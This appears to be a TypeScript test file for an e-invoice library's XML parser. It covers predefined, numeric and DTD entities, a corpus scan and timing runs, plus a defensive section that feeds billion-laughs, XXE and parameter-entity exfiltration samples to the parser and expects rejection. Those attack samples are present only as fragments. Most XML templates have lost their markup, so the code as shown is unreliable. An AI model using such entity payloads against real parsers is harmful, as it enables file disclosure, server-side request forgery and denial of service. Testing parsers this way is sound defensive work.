import { expect, tap } from '@git.zone/tstest/tapbundle';
import * as einvoice from '../../../ts/index.js';
import * as plugins from '../../plugins.js';
import { CorpusLoader } from '../../helpers/corpus.loader.js';
import { PerformanceTracker } from '../../helpers/performance.tracker.js';
tap.test('PARSE-09: Entity Reference Resolution - Handle XML entities correctly', async (t) => {
const performanceTracker = new PerformanceTracker('PARSE-09');
await t.test('Predefined XML entities', async () => {
performanceTracker.startOperation('predefined-entities');
const predefinedEntities = [
{
name: 'Ampersand',
entity: '&',
character: '&',
description: 'Used in company names and text'
},
{
name: 'Less than',
entity: '<',
character: '<',
description: 'Used in text content'
},
{
name: 'Greater than',
entity: '>',
character: '>',
description: 'Used in text content'
},
{
name: 'Quote',
entity: '"',
character: '"',
description: 'Used in attribute values'
},
{
name: 'Apostrophe',
entity: ''',
character: "'",
description: 'Used in attribute values'
}
];
for (const entity of predefinedEntities) {
const startTime = performance.now();
const testXml = `
Test ${entity.entity} Company
Text with ${entity.entity} entity
`;
console.log(`${entity.name} entity (${entity.entity}):`);
console.log(` Character: "${entity.character}"`);
console.log(` Usage: ${entity.description}`);
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(testXml);
console.log(' ✓ Entity resolved correctly');
} else {
console.log(' ⚠️ Cannot test without fromXmlString');
}
} catch (error) {
console.log(` ✗ Error: ${error.message}`);
}
performanceTracker.recordMetric('predefined-entity', performance.now() - startTime);
}
performanceTracker.endOperation('predefined-entities');
});
await t.test('Numeric character references', async () => {
performanceTracker.startOperation('numeric-entities');
const numericTests = [
{
name: 'Decimal references',
tests: [
{ ref: 'A', char: 'A', description: 'Latin capital A' },
{ ref: '€', char: '€', description: 'Euro sign' },
{ ref: '©', char: '©', description: 'Copyright symbol' },
{ ref: '™', char: '™', description: 'Trademark symbol' },
{ ref: '°', char: '°', description: 'Degree symbol' }
]
},
{
name: 'Hexadecimal references',
tests: [
{ ref: 'A', char: 'A', description: 'Latin capital A (hex)' },
{ ref: '€', char: '€', description: 'Euro sign (hex)' },
{ ref: '©', char: '©', description: 'Copyright (hex)' },
{ ref: '™', char: '™', description: 'Trademark (hex)' },
{ ref: '°', char: '°', description: 'Degree (hex)' }
]
}
];
for (const category of numericTests) {
console.log(`\n${category.name}:`);
for (const test of category.tests) {
const startTime = performance.now();
const xml = `
100.00
${test.ref}C
${test.ref} 2024
`;
console.log(` ${test.ref} = "${test.char}" (${test.description})`);
try {
// Verify entity resolution
const resolved = xml.replace(new RegExp(test.ref, 'g'), test.char);
if (resolved.includes(test.char)) {
console.log(' ✓ Entity would resolve correctly');
}
} catch (error) {
console.log(` ✗ Resolution error: ${error.message}`);
}
performanceTracker.recordMetric('numeric-ref', performance.now() - startTime);
}
}
performanceTracker.endOperation('numeric-entities');
});
await t.test('Custom entity definitions (DTD)', async () => {
performanceTracker.startOperation('custom-entities');
const customEntityTests = [
{
name: 'Internal DTD entities',
xml: `
]>
&company;
&address;
01-01-&year;
1000.00
`,
entities: {
'company': 'Acme Corporation',
'address': '123 Main Street, London',
'year': '2024',
'currency': 'EUR'
}
},
{
name: 'Parameter entities',
xml: `
%common;
]>
&company;
`,
description: 'External parameter entities (security risk)'
},
{
name: 'Nested entity references',
xml: `
]>
&fullAddress;
`,
expected: 'London, UK'
}
];
for (const test of customEntityTests) {
const startTime = performance.now();
console.log(`\n${test.name}:`);
if (test.entities) {
console.log(' Defined entities:');
for (const [name, value] of Object.entries(test.entities)) {
console.log(` &${name}; = "${value}"`);
}
}
if (test.description) {
console.log(` Note: ${test.description}`);
}
if (test.expected) {
console.log(` Expected result: ${test.expected}`);
}
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
// Note: Many parsers disable DTD processing by default for security
await invoice.fromXmlString(test.xml);
console.log(' ✓ Parsed (DTD support may vary)');
}
} catch (error) {
console.log(` ⚠️ DTD parsing: ${error.message}`);
console.log(' Note: DTD processing often disabled for security');
}
performanceTracker.recordMetric('custom-entity', performance.now() - startTime);
}
performanceTracker.endOperation('custom-entities');
});
await t.test('Entity security considerations', async () => {
performanceTracker.startOperation('entity-security');
const securityTests = [
{
name: 'Billion laughs attack (XML bomb)',
xml: `
]>
&lol4;
`,
risk: 'Exponential entity expansion',
mitigation: 'Disable DTD processing or limit entity expansion'
},
{
name: 'External entity injection (XXE)',
xml: `
]>
&xxe;
`,
risk: 'File disclosure, SSRF',
mitigation: 'Disable external entity resolution'
},
{
name: 'Parameter entity XXE',
xml: `
">
%eval;
%exfil;
]>
`,
risk: 'Out-of-band data exfiltration',
mitigation: 'Disable parameter entities'
}
];
for (const test of securityTests) {
console.log(`\n${test.name}:`);
console.log(` Risk: ${test.risk}`);
console.log(` Mitigation: ${test.mitigation}`);
const startTime = performance.now();
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(test.xml);
console.log(' ⚠️ SECURITY WARNING: Parser allowed dangerous entities!');
}
} catch (error) {
console.log(' ✓ Parser correctly rejected dangerous entities');
console.log(` Error: ${error.message}`);
}
performanceTracker.recordMetric('security-test', performance.now() - startTime);
}
performanceTracker.endOperation('entity-security');
});
await t.test('Entity usage in e-invoices', async () => {
performanceTracker.startOperation('einvoice-entities');
const einvoicePatterns = [
{
name: 'Currency symbols',
examples: [
{ text: 'Price in € (EUR)', entity: '€', resolved: '€' },
{ text: 'Amount in £ (GBP)', entity: '£', resolved: '£' },
{ text: 'Cost in $ (USD)', entity: '$', resolved: '$' },
{ text: 'Price in ¥ (JPY)', entity: '¥', resolved: '¥' }
]
},
{
name: 'Special characters in company names',
examples: [
{ text: 'Smith & Jones Ltd.', entity: '&', resolved: '&' },
{ text: 'AT&T Communications', entity: '&', resolved: '&' },
{ text: 'L'Oréal Paris', entity: ''', resolved: "'" },
{ text: '"Best Price" Store', entity: '"', resolved: '"' }
]
},
{
name: 'Legal symbols',
examples: [
{ text: 'Copyright © 2024', entity: '©', resolved: '©' },
{ text: 'Registered ®', entity: '®', resolved: '®' },
{ text: 'Trademark ™', entity: '™', resolved: '™' }
]
},
{
name: 'Mathematical symbols',
examples: [
{ text: 'Temperature ±2°C', entity: '±/°', resolved: '±/°' },
{ text: 'Discount ≤ 50%', entity: '≤', resolved: '≤' },
{ text: 'Quantity × Price', entity: '×', resolved: '×' }
]
}
];
for (const category of einvoicePatterns) {
console.log(`\n${category.name}:`);
for (const example of category.examples) {
console.log(` "${example.text}"`);
console.log(` Entity: ${example.entity} → ${example.resolved}`);
}
}
performanceTracker.endOperation('einvoice-entities');
});
await t.test('Corpus entity analysis', async () => {
performanceTracker.startOperation('corpus-entities');
const corpusLoader = new CorpusLoader();
const xmlFiles = await corpusLoader.getFiles(/\.(xml|ubl|cii)$/);
console.log(`\nAnalyzing entity usage in ${xmlFiles.length} corpus files...`);
const entityStats = {
total: 0,
filesWithEntities: 0,
predefinedEntities: new Map(),
numericEntities: 0,
customEntities: 0,
dtdFiles: 0
};
const sampleSize = Math.min(100, xmlFiles.length);
const sampledFiles = xmlFiles.slice(0, sampleSize);
for (const file of sampledFiles) {
entityStats.total++;
try {
const content = await plugins.fs.readFile(file.path, 'utf8');
let hasEntities = false;
// Check for predefined entities
const predefined = ['&', '<', '>', '"', '''];
for (const entity of predefined) {
if (content.includes(entity)) {
hasEntities = true;
entityStats.predefinedEntities.set(
entity,
(entityStats.predefinedEntities.get(entity) || 0) + 1
);
}
}
// Check for numeric entities
if (/\d+;|[\dA-Fa-f]+;/.test(content)) {
hasEntities = true;
entityStats.numericEntities++;
}
// Check for DTD
if (content.includes(' {
performanceTracker.startOperation('entity-performance');
// Generate XML with varying entity density
const generateXmlWithEntities = (entityCount: number): string => {
let xml = '\n\n';
for (let i = 0; i < entityCount; i++) {
xml += ` Text with & entity € and © symbols\n`;
}
xml += '';
return xml;
};
const testSizes = [10, 100, 500, 1000];
console.log('\nEntity resolution performance:');
for (const size of testSizes) {
const xml = generateXmlWithEntities(size);
const xmlSize = Buffer.byteLength(xml, 'utf8');
const entityCount = size * 3; // 3 entities per field
const startTime = performance.now();
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(xml);
}
const parseTime = performance.now() - startTime;
console.log(` ${entityCount} entities (${(xmlSize/1024).toFixed(1)}KB):`);
console.log(` Parse time: ${parseTime.toFixed(2)}ms`);
console.log(` Entities/ms: ${(entityCount / parseTime).toFixed(1)}`);
performanceTracker.recordMetric(`entities-${size}`, parseTime);
} catch (error) {
console.log(` Error with ${size} entities: ${error.message}`);
}
}
performanceTracker.endOperation('entity-performance');
});
// Performance summary
console.log('\n' + performanceTracker.getSummary());
// Entity handling best practices
console.log('\nEntity Reference Resolution Best Practices:');
console.log('1. Always handle predefined XML entities (& < > " ')');
console.log('2. Support numeric character references (decimal and hex)');
console.log('3. Be cautious with DTD processing (security risks)');
console.log('4. Disable external entity resolution by default');
console.log('5. Limit entity expansion depth to prevent attacks');
console.log('6. Validate resolved content after entity expansion');
console.log('7. Consider entity usage impact on performance');
console.log('8. Document security settings clearly for users');
});
tap.start();